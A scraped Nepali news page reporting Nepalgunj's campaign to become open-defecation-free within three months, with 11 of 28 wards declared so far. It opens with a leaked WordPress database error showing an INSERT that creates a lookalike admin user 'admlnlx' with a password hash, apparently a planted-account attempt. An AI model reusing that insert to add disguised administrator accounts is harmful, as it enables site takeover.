WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvbmukz.FA1gLRRdl1uJt6WuMiZlxW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-21 09:34:37', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ५ –
नेपालगन्जलाई अवको तीन महिनाभित्र खुलादिसामुक्त घोषणा गर्ने गरी उपमहानगरपालिकाले अभियान थाल्ने भएको छ । आज भएको समिक्षात्मक बैठकमा उपमहानगरपालिकाले अभियान सुस्ताएको स्विकार गर्दै अव गति बढाउने निर्णयमा पुगेको हो ।
‘प्रारम्भिक खाका तयार पारिएको छ बैठकपछि उपमहानगरपालिकाका कार्यकारी प्रमुख गिरीराज ज्ञवालीले भन्नुभयो– ‘तीन महिना भित्रमा नेपालगन्जलाई खुला दिसामुक्त घोषणा गरिने छ ।’त्यसका लागि नगरस्तरीय राजनीतिक दल, वडा सचिव, सामाजिक परिचालक र कर्मचारी सबैले सामुहिक प्रतिबद्धता दोहोराएको पनि उहाँले वताउनुभयो ।
२८ वटा वडा रहेको उपमहानगरमा अहिलेसम्म केवल ११ वटा वडा मात्र खुल्ला दिसामुक्त घोषणा भएका छन । अझै १७ वटा वडालाई खुल्ला दिसामुक्त घोषणा गर्न बाँकी छ । १, २, ३, ४, ५, ६, ८, ९, १०, २१ र २४ नम्वरका वडा मात्र खुल्ला दिसामुक्त घोषणा गरिएको छ ।